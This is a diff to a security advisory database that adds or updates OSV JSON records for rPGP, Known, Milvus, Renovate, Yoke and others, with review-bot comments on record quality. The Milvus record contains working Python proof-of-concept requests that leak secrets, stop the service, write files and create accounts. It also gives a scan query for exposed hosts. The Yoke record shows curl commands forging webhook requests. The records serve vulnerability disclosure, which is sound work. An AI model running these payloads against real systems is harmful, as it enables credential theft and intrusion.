+ "url": "https://github.com/rpgp/rpgp"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-703"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:54:19Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
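Review bot: The details cite the upstream rsa-crate advisory GHSA-9c48-w39g-hm26 and RustCrypto/RSA#624 as the root cause, but `references` lists only rPGP URLs, so tooling cannot link this record to the crate it actually depends on; add `{"type": "ADVISORY", "url": "https://github.com/RustCrypto/RSA/security/advisories/GHSA-9c48-w39g-hm26"}`. The summary says "through CVE-2026-21895" while `aliases` is empty — correct, since that CVE belongs to the rsa crate, but if the database emits the OSV `related` field this is the place for it. The affected entry also lacks `last_known_affected_version_range` (`"<= 0.18.0"` per the details) that the other new entries in this batch carry.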
diff --git a/advisories/github-reviewed/2026/02/GHSA-78wq-6gcv-w28r/GHSA-78wq-6gcv-w28r.json b/advisories/github-reviewed/2026/02/GHSA-78wq-6gcv-w28r/GHSA-78wq-6gcv-w28r.json
new file mode 100644
index 0000000000000..f2f83fffa5cb2
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-78wq-6gcv-w28r/GHSA-78wq-6gcv-w28r.json
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-78wq-6gcv-w28r",
+ "modified": "2026-02-13T22:49:27Z",
+ "published": "2026-02-13T22:49:27Z",
+ "aliases": [
+ "CVE-2026-26273"
+ ],
+ "summary": "Known affected by Account Takeover via Password Reset Token Leakage",
+ "details": "### Summary\nA Critical Broken Authentication vulnerability exists in Known 1.6.2. The application leaks the password reset token within a hidden HTML input field on the password reset page. This allows any unauthenticated attacker to retrieve the reset token for any user by simply querying the user's email, leading to full Account Takeover (ATO) without requiring access to the victim's email inbox.\n\n### Details\nThe vulnerability occurs within the password reset flow. When a reset is requested, the application generates a verification code. However, the subsequent reset page (/account/password/reset/) incorrectly reflects this code back to the client in the HTML source code.\n\nSpecifically, the sensitive token is embedded in:\n\n\nBecause this page is accessible via a GET request using the victim's email as a parameter, an attacker can programmatically extract the token.\n\n### PoC\n1. The attacker asks for a password reset for the victim\n\n
\n\n
\n\n\n2. The attacker makes the following curl command on the terminal using the victim's email, and is able to get the code that was sent as an hidden field in the HTML.\n
\n\n3. With this code, the attacker is able to use it in order to reset the victim password.\n
\n\n
\n\n4. The attacker is able to login with the new password.\n\n
\n\n
\n\n\n\n### Impact\n- An attacker can compromise any account on the platform, including administrative accounts, resulting in total loss of Confidentiality, Integrity, and Availability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "idno/known"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.6.3"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.6.2"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/idno/known/security/advisories/GHSA-78wq-6gcv-w28r"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/idno/known/commit/8439a0747471559fb1ea9f074b929d390f27e66a"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/idno/known"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/idno/known/releases/tag/1.6.3"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200",
+ "CWE-640"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T22:49:27Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
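Review bot: The key evidence is missing from `details`: "Specifically, the sensitive token is embedded in:" is followed by nothing, and PoC steps 1–4 are likewise empty, so the element (presumably a hidden `input` on `/account/password/reset/`) and the curl command were stripped with the markup. Re-add them inside a fenced block or entity-escaped so the reproduction survives rendering. The vector is `CVSS:3.0` while every other entry in this change uses `CVSS:3.1`; the score is unaffected but the inconsistency is easy to fix now.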
diff --git a/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json b/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json
index a071acda2440b..bb867f815572c 100644
--- a/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json
+++ b/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json
@@ -1,9 +1,11 @@
{
"schema_version": "1.4.0",
"id": "GHSA-7ppg-37fh-vcr6",
- "modified": "2026-02-11T19:49:44Z",
+ "modified": "2026-02-13T17:17:11Z",
"published": "2026-02-11T19:49:44Z",
- "aliases": [],
+ "aliases": [
+ "CVE-2026-26190"
+ ],
"summary": "Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise",
"details": "## Summary\n\nMilvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:\n\n1. The `/expr` debug endpoint uses a weak, predictable default authentication token derived from `etcd.rootPath` (default: `by-dev`), enabling arbitrary expression evaluation.\n2. The full REST API (`/api/v1/*`) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.\n\n## Details\n\n### Vulnerability 1: Weak Default Authentication on `/expr` Endpoint\n\nThe `/expr` endpoint on port 9091 accepts an `auth` parameter that defaults to the `etcd.rootPath` value (`by-dev`). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:\n\n- **Information/Credential Disclosure**: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via `param.MinioCfg.SecretAccessKey.GetValue()`, `rootcoord.meta.GetCredential(ctx, 'root')`, etc.\n- **Denial of Service**: Invoking `proxy.Stop()` to shut down the proxy service.\n- **Arbitrary File Write (potential RCE)**: Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.\n\n### Vulnerability 2: Unauthenticated REST API on Metrics Port\n\nBusiness-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via `registerHTTPServer()` in [`internal/distributed/proxy/service.go` (line 170)](https://github.com/milvus-io/milvus/blob/9996e8d1cebff7e7108bcb16d43124236de77438/internal/distributed/proxy/service.go#L170). 
These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.\n\nAn attacker can perform any business operation without credentials, including:\n\n- Creating, listing, and deleting collections\n- Inserting and querying data\n- Creating, listing, and deleting user credentials\n- Modifying user passwords\n\n## Proof of Concept\n\n### PoC 1 — `/expr` Endpoint Exploitation\n\n```python\nimport requests\n\nurl = \"http://:9091/expr\"\n\n# Leak sensitive configuration (e.g., MinIO secret key)\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"param.MinioCfg.SecretAccessKey.GetValue()\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Retrieve hashed credentials for the root user\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"rootcoord.meta.GetCredential(ctx, 'root')\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Denial of Service — stop the proxy\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"proxy.Stop()\"\n}, timeout=5)\n\n# Arbitrary file write (potential RCE)\nfor cmd in [\n 'param.Save(\"proxy.accessLog.localPath\", \"/tmp\")',\n 'param.Save(\"proxy.accessLog.formatters.base.format\", \"whoami\")',\n 'param.Save(\"proxy.accessLog.filename\", \"evil.sh\")',\n 'querycoord.etcdCli.KV.Put(ctx, \"by-dev/config/proxy/accessLog/enable\", \"true\")'\n]:\n requests.get(url, params={\"auth\": \"by-dev\", \"code\": cmd}, timeout=5)\n```\n\n### PoC 2 — Unauthenticated REST API Access\n\n```python\nimport requests\n\ntarget_url = \"http://:9091\"\n\n# Create a user without any authentication\nres = requests.post(f\"{target_url}/api/v1/credential\", json={\n \"username\": \"attacker_user\",\n \"password\": \"MTIzNDU2Nzg5\",\n})\nprint(res.json())\n\n# List all users\nres = requests.get(f\"{target_url}/api/v1/credential/users\")\nprint(res.json()) # {'status': {}, 'usernames': ['root', 'attacker_user']}\n\n# Create and 
delete collections, insert data — all without authentication\n```\n\n## Internet Exposure\n\nA significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:\n\n```\nhttp.body=\"404 page not found\" && port=\"9091\"\n```\n\nThis indicates the vulnerability is actively exploitable in real-world production environments.\n\n## Impact\n\nAn unauthenticated remote attacker with network access to port 9091 can:\n\n1. **Exfiltrate secrets and credentials** — MinIO keys, etcd credentials, user password hashes, and all internal configuration values.\n2. **Manipulate all data** — Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.\n3. **Manage user accounts** — Create administrative users, reset passwords, and escalate privileges.\n4. **Cause denial of service** — Shut down proxy services, drop databases, or corrupt metadata.\n5. **Write arbitrary files** — Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.\n\n## Remediation\n\n### Recommended Fixes\n\n1. **Remove or disable the `/expr` endpoint** in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.\n2. **Do not register business API routes on the metrics port.** Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.\n3. **Bind port 9091 to localhost by default** (`127.0.0.1:9091`) so it is not externally accessible unless explicitly configured.\n4. 
**Enforce authentication on all API endpoints**, regardless of which port they are served on.\n\n### User Mitigations (until patched)\n\n- Block external access to port 9091 using firewall rules or network policies.\n- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.\n- Change the `etcd.rootPath` from the default value `by-dev` to a strong, random value (partial mitigation only — does not address the unauthenticated REST API).\n\n## Credit\n\nThis vulnerability was discovered and responsibly reported by **YingLin Xie** (xieyinglin@hust.edu.cn). It was independently reported by [0x1f](https://github.com/0x1f) and zznQ ([ac0d3r](https://github.com/ac0d3r)).",
"severity": [
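Review bot: The PoC URLs in `details` read `http://:9091/expr` and `http://:9091` — the host placeholder (likely written as an angle-bracketed token) was stripped, so the reproduction as stored is not runnable; a plain `TARGET_HOST` placeholder would survive sanitization. This predates the alias addition in this hunk, but since the record is being touched for CVE-2026-26190 it is a cheap fix to carry along. The references list is outside this hunk, so I cannot tell whether the NVD entry for the new alias was added.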
diff --git a/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json b/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json
index b654c6ebe59a7..277f68bdc730a 100644
--- a/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json
+++ b/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-87fh-rc96-6fr6",
- "modified": "2026-02-07T00:32:04Z",
+ "modified": "2026-02-13T17:16:07Z",
"published": "2026-02-05T21:19:30Z",
"aliases": [
"CVE-2026-25758"
@@ -140,6 +140,10 @@
"type": "WEB",
"url": "https://github.com/spree/spree/commit/ff7cfcfcfe0c40c60d03317e1d0ee361c6a6b054"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_api/CVE-2026-25758.yml"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/spree/spree"
diff --git a/advisories/github-reviewed/2026/02/GHSA-8h58-w33p-wq3g/GHSA-8h58-w33p-wq3g.json b/advisories/github-reviewed/2026/02/GHSA-8h58-w33p-wq3g/GHSA-8h58-w33p-wq3g.json
new file mode 100644
index 0000000000000..b662a0da07183
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-8h58-w33p-wq3g/GHSA-8h58-w33p-wq3g.json
@@ -0,0 +1,63 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8h58-w33p-wq3g",
+ "modified": "2026-02-13T20:54:27Z",
+ "published": "2026-02-13T20:54:27Z",
+ "aliases": [],
+ "summary": "rPGP affected by crash in message handling for deeply nested messages",
+ "details": "### Summary\nPrevious rPGP versions could be caused to crash with a \"stack overflow\" when parsing messages that contain deeply nested message layers, such as messages with many signatures.\n\nrPGP 0.19.0 resolves this issue with a more robust message handling implementation (via https://github.com/rpgp/rpgp/pull/625).\n\n### Impact\nAn attacker could cause applications to crash in rPGP's message parsing subsystem, when applications attempt to ingest messages.\n\n### Attribution\nDiscovered internally during rPGP development, using a fuzz test suite previously contributed by Christian Reitter.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "pgp"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.16.0-alpha.0"
+ },
+ {
+ "fixed": "0.19.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/security/advisories/GHSA-8h58-w33p-wq3g"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/pull/625"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/commit/e82f2c7494ba277d62fd372d69b2c008473bbef8"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/rpgp/rpgp"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:54:27Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
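Review bot: The `cwe_ids` entry `"CWE-121"` (Stack-based Buffer Overflow) does not match the defect the details describe, which is stack exhaustion while recursing over deeply nested message layers, not an out-of-bounds write to a stack buffer; `"CWE-674"` (Uncontrolled Recursion) is the closer classification. Tagging it as a memory-corruption CWE also overstates the bug for consumers that triage on CWE, since the record itself claims only a crash (`VA:H` with `VC:N/VI:N`). I would change the array to `"cwe_ids": ["CWE-674"]`, and if the intent was to capture the resource-exhaustion effect, `"CWE-400"` alongside it rather than CWE-121.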
diff --git a/advisories/github-reviewed/2026/02/GHSA-8wc6-vgrq-x6cf/GHSA-8wc6-vgrq-x6cf.json b/advisories/github-reviewed/2026/02/GHSA-8wc6-vgrq-x6cf/GHSA-8wc6-vgrq-x6cf.json
new file mode 100644
index 0000000000000..bf8e663ee6057
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-8wc6-vgrq-x6cf/GHSA-8wc6-vgrq-x6cf.json
@@ -0,0 +1,82 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8wc6-vgrq-x6cf",
+ "modified": "2026-02-13T20:53:58Z",
+ "published": "2026-02-13T20:53:58Z",
+ "aliases": [],
+ "summary": "Child processes spawned by Renovate incorrectly have full access to environment variables",
+ "details": "When Renovate spawns child processes, their access to environment variables is filtered to an allowlist, to prevent unauthorized access to privileged credentials that the Renovate process has access to.\n\nSince [42.68.1](https://github.com/renovatebot/renovate/releases/tag/42.68.1) (2025-12-30), this filtering had been **inadvertently removed**, and so any child processes spawned from these versions will have had access to any environment variables that Renovate has access to.\n\nThis could lead to [insider attackers](https://docs.renovatebot.com/security-and-permissions/#execution-of-code-insider-attack) and [outside attackers](https://docs.renovatebot.com/security-and-permissions/#execution-of-code-outsider-attack) being able to exflitrate secrets from the Renovate deployment.\n\nIt is recommended to rotate (+ revoke) any credentials that Renovate has access to, in case any spawned child processes have attempted to exfiltrate any secrets.\n\n## Impact\n\nChild processes spawned by Renovate (i.e. `npm install`, anything defined in [`postUpgradeTasks`](https://docs.renovatebot.com/configuration-options/#postupgradetasks) or [`postUpdateOptions`](https://docs.renovatebot.com/configuration-options/#postupdateoptions)) will have full access to the environment variables that the Renovate process has. 
\n\nThis could lead to [insider attackers](https://docs.renovatebot.com/security-and-permissions/#execution-of-code-insider-attack) and [outside attackers](https://docs.renovatebot.com/security-and-permissions/#execution-of-code-outsider-attack) being able to exflitrate secrets from the Renovate deployment.\n\n## Patches\n\nThis is patched in [42.96.3](https://github.com/renovatebot/renovate/releases/tag/42.96.3) and [43.4.4](https://github.com/renovatebot/renovate/releases/tag/43.4.4).\n\n## Workarounds\n\nThere are no workarounds, other than upgrading your Renovate version.\n\n## Why did this happen?\n\nAs part of work towards https://github.com/renovatebot/renovate/security/advisories/GHSA-pfq2-hh62-7m96, one of the [preparatory changes](https://github.com/renovatebot/renovate/pull/40212) we made was moving to [`execa`](https://www.npmjs.com/package/execa).\n\nOne of the default behaviours of `execa` is to [extend the process' environment variables with any new ones](https://github.com/sindresorhus/execa/tree/v8.0.1?tab=readme-ov-file#extendenv), rather than override them.\n\nThis was missed in code review, which meant that since this version, the full environment variables have been provided to any child processes spawned with `execa` by Renovate.\n\nThis was discovered as part of an unrelated change.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "renovate"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "42.68.1"
+ },
+ {
+ "fixed": "42.96.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "renovate"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "43.0.0"
+ },
+ {
+ "fixed": "43.4.4"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-8wc6-vgrq-x6cf"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/renovatebot/renovate"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/renovatebot/renovate/releases/tag/42.96.3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/renovatebot/renovate/releases/tag/43.4.4"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-269"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:53:58Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
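Review bot: The `details` string repeats the paragraph beginning "This could lead to [insider attackers]" verbatim inside the Impact section, and both copies misspell "exfiltrate" as "exflitrate"; the second copy should be dropped and the spelling fixed in both the first paragraph and the Impact paragraph. The CVSS vector's `AV:L` also reads oddly for a tool whose affected code paths (`npm install`, `postUpgradeTasks`) are driven by repository content that the text itself frames as an outsider attack, so it is worth confirming the local-vector choice was deliberate. Finally, the Workarounds section says there are none, while the opening text recommends rotating and revoking credentials; that recommendation belongs under Workarounds too so readers who skip to that section see it.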
diff --git a/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json b/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json
index d2ecb5f8b36fb..3abcd13dcb9ec 100644
--- a/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json
+++ b/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json
@@ -1,14 +1,19 @@
{
"schema_version": "1.4.0",
"id": "GHSA-965m-v4cc-6334",
- "modified": "2026-02-12T22:06:36Z",
+ "modified": "2026-02-13T17:15:36Z",
"published": "2026-02-12T22:06:36Z",
"aliases": [
"CVE-2026-26055"
],
"summary": "Unauthenticated Admission Webhook Endpoints in Yoke ATC",
"details": "# Unauthenticated Admission Webhook Endpoints in Yoke ATC\n\nThis vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. The ATC webhook endpoints lack proper authentication mechanisms, allowing any pod within the cluster network to directly send AdmissionReview requests to the webhook, bypassing Kubernetes API Server authentication. This enables attackers to trigger WASM module execution in the ATC controller context without proper authorization.\n\n**Recommended CWE**: CWE-306 (Missing Authentication for Critical Function)\n\n## Summary\n\nYoke ATC implements multiple Admission Webhook endpoints (`/validations/{airway}`, `/validations/resources`, `/validations/flights.yoke.cd`, `/validations/airways.yoke.cd`, etc.) that process AdmissionReview requests. These endpoints do not implement TLS client certificate authentication or request source validation. Any client that can reach the ATC service within the cluster can send requests directly to these endpoints, bypassing the Kubernetes API Server's authentication and authorization mechanisms.\n\n## Details\n\nThe vulnerability exists in the HTTP handler implementation where webhook endpoints accept and process requests without verifying the client identity.\n\n**Vulnerable Endpoint Handlers** (`cmd/atc/handler.go:147-335`):\n```go\nmux.HandleFunc(\"POST /validations/{airway}\", func(w http.ResponseWriter, r *http.Request) {\n var review admissionv1.AdmissionReview\n if err := json.NewDecoder(r.Body).Decode(&review); err != nil {\n http.Error(w, fmt.Sprintf(\"failed to decode review: %v\", err), http.StatusBadRequest)\n return\n }\n // No authentication check - request is processed directly\n // ...\n})\n```\n\n**Additional Unauthenticated Endpoints**:\n- `/validations/resources` (`cmd/atc/handler.go:337-538`)\n- `/validations/external-resources` (`cmd/atc/handler.go:540-597`)\n- `/validations/airways.yoke.cd` (`cmd/atc/handler.go:599-636`)\n- 
`/validations/flights.yoke.cd` (`cmd/atc/handler.go:638-733`)\n- `/crdconvert/{airway}` (`cmd/atc/handler.go:61-145`)\n\nThe code lacks:\n1. TLS client certificate verification\n2. Request source validation (verifying requests come from kube-apiserver)\n3. Any form of authentication middleware\n\n## PoC\n\n### Environment Setup\n\n**Prerequisites**:\n- Docker installed and running\n- kubectl installed\n- Go 1.21+ installed\n- kind installed\n\n**Step 1: Create Kind cluster**\n```bash\ncat > /tmp/kind-config.yaml << 'EOF'\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nname: yoke-vuln-test\nnodes:\n- role: control-plane\nEOF\n\nkind create cluster --config /tmp/kind-config.yaml\n```\n\n**Step 2: Build and install Yoke CLI**\n```bash\ngit clone https://github.com/yokecd/yoke.git\ncd yoke\nGOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke\n```\n\n**Step 3: Deploy ATC**\n```bash\n/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest\n```\n\n**Step 4: Deploy Backend Airway example**\n```bash\n/tmp/yoke takeoff -wait 60s backendairway \"https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz\"\n```\n\n### Exploitation Steps\n\n**Step 1: Create attacker pod**\n```bash\nkubectl apply -f - < /tmp/malicious-review.json << 'EOF'\n{\n \"apiVersion\": \"admission.k8s.io/v1\",\n \"kind\": \"AdmissionReview\",\n \"request\": {\n \"uid\": \"vul002-exploit-uid\",\n \"kind\": {\"group\": \"examples.com\", \"version\": \"v1\", \"kind\": \"Backend\"},\n \"resource\": {\"group\": \"examples.com\", \"version\": \"v1\", \"resource\": \"backends\"},\n \"name\": \"exploit-backend\",\n \"namespace\": \"default\",\n \"operation\": \"CREATE\",\n \"userInfo\": {\"username\": \"attacker-from-pod\", \"groups\": [\"system:unauthenticated\"]},\n \"object\": {\n \"apiVersion\": \"examples.com/v1\",\n \"kind\": \"Backend\",\n \"metadata\": {\"name\": \"exploit-backend\", \"namespace\": 
\"default\"},\n \"spec\": {\"image\": \"nginx:latest\", \"replicas\": 1}\n }\n }\n}\nEOF\n\nkubectl cp /tmp/malicious-review.json webhook-attacker:/tmp/malicious-review.json\n```\n\nSend the request:\n```bash\nkubectl exec webhook-attacker -- curl -k -s -X POST \\\n https://atc-atc.atc.svc.cluster.local:80/validations/backends.examples.com \\\n -H \"Content-Type: application/json\" \\\n -d @/tmp/malicious-review.json\n```\n\nActual output from verification:\n```json\n{\"kind\":\"AdmissionReview\",\"apiVersion\":\"admission.k8s.io/v1\",\"request\":{\"uid\":\"vul002-normal-test\",\"kind\":{\"group\":\"examples.com\",\"version\":\"v1\",\"kind\":\"Backend\"},\"resource\":{\"group\":\"examples.com\",\"version\":\"v1\",\"resource\":\"backends\"},\"name\":\"vul002-normal-backend\",\"namespace\":\"default\",\"operation\":\"CREATE\",\"userInfo\":{\"username\":\"attacker-from-pod\",\"groups\":[\"system:unauthenticated\"]},\"object\":{\"apiVersion\":\"examples.com/v1\",\"kind\":\"Backend\",\"metadata\":{\"name\":\"vul002-normal-backend\",\"namespace\":\"default\"},\"spec\":{\"image\":\"nginx:latest\",\"replicas\":1}},\"oldObject\":null,\"options\":null},\"response\":{\"uid\":\"vul002-normal-test\",\"allowed\":false,\"status\":{\"metadata\":{},\"status\":\"Failure\",\"message\":\"applying resource returned errors during dry-run...\"}}}\n```\n\n**Step 4: Verify ATC logs**\n```bash\nkubectl logs -n atc deployment/atc-atc --tail=20 | grep backends.examples.com\n```\n\nActual log output:\n```json\n{\"time\":\"2026-02-01T15:29:08.890991543Z\",\"level\":\"INFO\",\"msg\":\"request served\",\"component\":\"server\",\"code\":200,\"method\":\"POST\",\"path\":\"/validations/backends.examples.com\",\"elapsed\":\"435ms\",\"validation\":{\"allowed\":false,\"status\":\"Invalid\"}}\n```\n\nThe `elapsed: 435ms` indicates WASM module execution occurred.\n\n### Expected Result\n\nThe attacker pod successfully sends AdmissionReview requests directly to the ATC webhook endpoint without any 
authentication. The ATC controller processes the request and executes the WASM module, proving that:\n1. No TLS client certificate is required\n2. No request source validation occurs\n3. The fake `userInfo` is accepted without verification\n4. WASM modules are executed based on unauthenticated requests\n\n## Impact\n\n**Vulnerability Type**: Missing Authentication / Authentication Bypass\n\n**Attack Prerequisites**:\n- Attacker has access to a pod within the cluster network\n- Network policies do not restrict access to the ATC service (common in default configurations)\n\n**Impact Assessment**:\n- **Confidentiality**: Medium - Attacker can trigger WASM execution which may access controller context data\n- **Integrity**: High - Combined with VUL-001, attacker can create arbitrary Kubernetes resources\n- **Availability**: Medium - Attacker can cause resource exhaustion through repeated requests\n\n**Attack Scenario**:\n1. Attacker compromises a pod or gains access to the cluster network\n2. Attacker sends crafted AdmissionReview requests directly to ATC webhook\n3. ATC processes requests without verifying they came from the API Server\n4. Combined with annotation injection (VUL-001), attacker can execute arbitrary WASM code\n5. 
Malicious WASM can create resources or exfiltrate data using ATC's cluster-admin privileges\n\n## Severity\n\n**CVSS v3.1 Score**: 7.5 (High)\n\n**Vector**: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n\n- Attack Vector (AV): Network - Accessible from cluster network\n- Attack Complexity (AC): Low - Simple HTTP request\n- Privileges Required (PR): None - No authentication required\n- User Interaction (UI): None - Automatic processing\n- Scope (S): Unchanged\n- Confidentiality (C): None - Direct impact limited\n- Integrity (I): High - Can trigger unauthorized WASM execution\n- Availability (A): None - No direct availability impact\n\nNote: When combined with VUL-001, the overall impact increases significantly.\n\n## Affected Versions\n\n- Yoke ATC v0.18.x and earlier versions\n- All versions that implement Admission Webhook endpoints without client authentication\n\n## Patched Versions\n\nNo patch available at time of disclosure.\n\n## Workarounds\n\n1. **Network Policy**: Deploy NetworkPolicy to restrict access to ATC service, allowing only kube-apiserver to connect\n```yaml\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n name: atc-webhook-policy\n namespace: atc\nspec:\n podSelector:\n matchLabels:\n yoke.cd/app: atc\n policyTypes:\n - Ingress\n ingress:\n - from:\n - namespaceSelector:\n matchLabels:\n kubernetes.io/metadata.name: kube-system\n podSelector:\n matchLabels:\n component: kube-apiserver\n```\n\n2. **Service Mesh**: Use a service mesh (Istio, Linkerd) to enforce mTLS between services\n\n3. 
**Pod Security**: Implement strict pod security policies to limit which pods can be created in the cluster\n\n## References\n\n- Yoke Project: https://github.com/yokecd/yoke\n- Kubernetes Admission Webhooks: https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/\n- CWE-306: Missing Authentication for Critical Function: https://cwe.mitre.org/data/definitions/306.html\n\n## Credits\ncredit for:\n@b0b0haha (603571786@qq.com)\n@lixingquzhi (mayedoushidalao@163.com)",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
"affected": [
{
"package": {
@@ -35,6 +40,10 @@
"type": "WEB",
"url": "https://github.com/yokecd/yoke/security/advisories/GHSA-965m-v4cc-6334"
},
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26055"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/yokecd/yoke"
@@ -51,6 +60,6 @@
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2026-02-12T22:06:36Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-12T22:16:06Z"
}
}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json
index f05345733c000..c4b1a394cd1e4 100644
--- a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json
